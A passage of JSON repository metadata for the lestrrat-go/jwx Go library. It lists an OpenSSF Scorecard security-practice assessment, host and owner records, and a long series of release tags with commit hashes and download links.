08-11","repo":{"name":"github.com/lestrrat-go/jwx","commit":"568c2c84f11f47f53126b44bf3a3d76993038cba"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":6.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":0,"reason":"Found 0/23 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:28","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:29","Warn: no topLevel permission defined: .github/workflows/assign-issue.yml:1","Warn: no topLevel permission defined: .github/workflows/assign-pr.yml:1","Warn: no topLevel permission defined: .github/workflows/autodoc.yml:1","Warn: no topLevel permission defined: .github/workflows/benchmark.yml:1","Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Warn: no topLevel permission defined: .github/workflows/codeql.yml:1","Warn: no topLevel permission defined: .github/workflows/dependabot.yml:1","Warn: no topLevel permission defined: .github/workflows/lint.yml:1","Warn: no topLevel permission defined: .github/workflows/smoke.yml:1","Warn: no topLevel permission defined: .github/workflows/stale.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Pinned-Dependencies","score":6,"reason":"dependency not pinned by hash detected -- score normalized to 6","details":["Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/ci.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:47: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: goCommand not pinned by hash: .github/workflows/benchmark.yml:33","Warn: goCommand not pinned by hash: .github/workflows/ci.yml:36","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:42","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:44","Info:  15 out of  18 GitHub-owned GitHubAction dependencies pinned","Info:   4 out of   5 third-party GitHubAction dependencies pinned","Info:   2 out of   6 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 24 commits out of 27 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T13:10:24.800Z","repository_id":37406150,"created_at":"2025-08-18T13:10:24.800Z","updated_at":"2025-08-18T13:10:24.800Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30897961,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-24T08:58:18.477Z","status":"ssl_error","status_checked_at":"2026-03-24T08:57:59.595Z","response_time":106,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"lestrrat-go","name":"lestrrat-go","uuid":"36653903","kind":"organization","description":"@lestrrat 's Go projects","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/36653903?v=4","repositories_count":99,"last_synced_at":"2023-08-07T14:22:53.617Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/lestrrat-go","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-06T19:45:03.488Z","updated_at":"2023-08-07T14:22:54.666Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go/repositories"},"tags":[{"name":"v3.0.13","sha":"163a6e94d45a8f89c7d0e25f30652a95c554bd88","kind":"commit","published_at":"2026-01-12T06:38:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.13/manifests"},{"name":"v3.0.12","sha":"987379965645db94a50483d7c21c9358b905469a","kind":"commit","published_at":"2025-10-20T09:17:05.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.12/manifests"},{"name":"v3.0.11","sha":"9e9c27a269a1a650e1f666b18946dd1796f84779","kind":"commit","published_at":"2025-09-14T02:50:03.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.11/manifests"},{"name":"v3.0.10","sha":"e14eb9b9730b352cb5f8854bbdf315bb98d1a5e0","kind":"commit","published_at":"2025-08-04T12:36:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.10/manifests"},{"name":"v3.0.9","sha":"8babbb1d64fda50d89276b5d52b1a682362334b2","kind":"commit","published_at":"2025-07-31T06:59:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.9/manifests"},{"name":"v3.0.8","sha":"7f3caf368dda160290bcc6952b4bfb549e308271","kind":"commit","published_at":"2025-06-27T10:33:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.8/manifests"},{"name":"v3.0.7","sha":"202bc50cf39999c4379eaaa593e4bd2aea9f870f","kind":"commit","published_at":"2025-06-16T00:42:56.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.7/manifests"},{"name":"v3.0.6","sha":"a68b08e71ab7cc4fb6098d2c453da41cc7a7967f","kind":"commit","published_at":"2025-06-13T11:06:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.6/manifests"},{"name":"v3.0.5","sha":"c3404a9d9937bc0d7a0f89ecfbc1303fd108c67d","kind":"commit","published_at":"2025-06-11T00:58:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.5/manifests"},{"name":"v3.0.4","sha":"3f1f2b899191cf6c40404736681a180e479c84eb","kind":"commit","published_at":"2025-06-09T12:04:08.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.4/manifests"},{"name":"v3.0.3","sha":"b1a4fc672df21b754d9904306e80c9be22deeba4","kind":"commit","published_at":"2025-06-06T01:53:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.3/manifests"},{"name":"v3.0.2","sha":"542198a7a000125443d53107fbd55c9336943c4d","kind":"commit","published_at":"2025-06-03T12:41:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.2/manifests"},{"name":"v2.1.6","sha":"13e92f3eb3982c11fa6a19280e00e3256237cf87","kind":"commit","published_at":"2025-04-29T08:17:11.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.6/manifests"},{"name":"v3.0.1","sha":"374ec5920fce56373ebe3a9c89134a2d6f81d4cd","kind":"commit","published_at":"2025-04-29T08:15:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.1/manifests"},{"name":"v2.1.5","sha":"a980d2346e8d17ddab69742e30ca1070018b0bf6","kind":"commit","published_at":"2025-04-16T11:17:27.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.5/manifests"},{"name":"v1.2.31","sha":"26ecf5d02cf6226f49e703bdddcae54dcf5ae0da","kind":"commit","published_at":"2025-04-09T10:38:17.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.31","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.31/manifests"},{"name":"v3.0.0","sha":"8884a402374939b27c9b96782e9e60a31aed75f6","kind":"commit","published_at":"2025-03-31T23:45:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0/manifests"},{"name":"v3.0.0-beta2","sha":"c44f4f6a7da1328f467d9c4a31f884bc7fd27fa6","kind":"commit","published_at":"2025-03-29T23:21:02.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-beta2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta2/manifests"},{"name":"v3.0.0-beta1","sha":"766a05908e5a0a90c40e5abb8cc4a3cfa523c7e8","kind":"commit","published_at":"2025-03-14T23:55:42.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-beta1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta1/manifests"},{"name":"v3.0.0-alpha3","sha":"da52a87c8b4bfb1d68fb6a07b1dc03d1be65d781","kind":"commit","published_at":"2025-03-13T00:03:55.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha3/manifests"},{"name":"v3.0.0-alpha2","sha":"0076496d247519f9650be6c5fff022f3a70e488c","kind":"commit","published_at":"2025-02-25T09:36:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha2/manifests"},{"name":"v2.1.4","sha":"de347302071b3af3457ac67e9885e1396b6ec023","kind":"commit","published_at":"2025-02-25T09:32:52.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"9e379c7bc07f7d931efcf6082b5456379aba496f","kind":"commit","published_at":"2024-11-24T10:03:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.3/manifests"},{"name":"v3.0.0-alpha1","sha":"64985973018b6e8057905dc107d442a9f52c92c8","kind":"commit","published_at":"2024-11-01T06:22:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha1/manifests"},{"name":"v2.1.2","sha":"536b643c661a886300246d2f334d4d836e61f497","kind":"commit","published_at":"2024-10-25T06:34:03.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.2/manifests"},{"name":"v1.2.30","sha":"a7656533fb37069151200cc0d1d61fd44b459d77","kind":"commit","published_at":"2024-07-28T00:14:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.30","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.30/manifests"},{"name":"v2.1.1","sha":"8d1d78351e9f259723f9f558889a78e327379683","kind":"commit","published_at":"2024-07-28T00:05:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"639d23173f8e958666dc34add887fe054d52790b","kind":"commit","published_at":"2024-06-17T22:49:20.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.0/manifests"},{"name":"v1.2.29","sha":"1025f8eec3bd80c8d8f1be8f9cad989a5b78fd4b","kind":"commit","published_at":"2024-03-07T02:56:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.29","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.29/manifests"},{"name":"v2.0.21","sha":"611d914efbccb0babbce54e48457070e12ab6498","kind":"commit","published_at":"2024-03-07T02:47:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.21","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.21/manifests"},{"name":"v2.0.20","sha":"c3b3a177580a7aaa73a033706d0009871c49bd8d","kind":"commit","published_at":"2024-02-19T23:34:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.20","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.20/manifests"},{"name":"v1.2.28","sha":"8c53d0ae52d5ab1e2b37c5abb67def9e7958fd65","kind":"commit","published_at":"2024-01-09T01:52:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.28","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/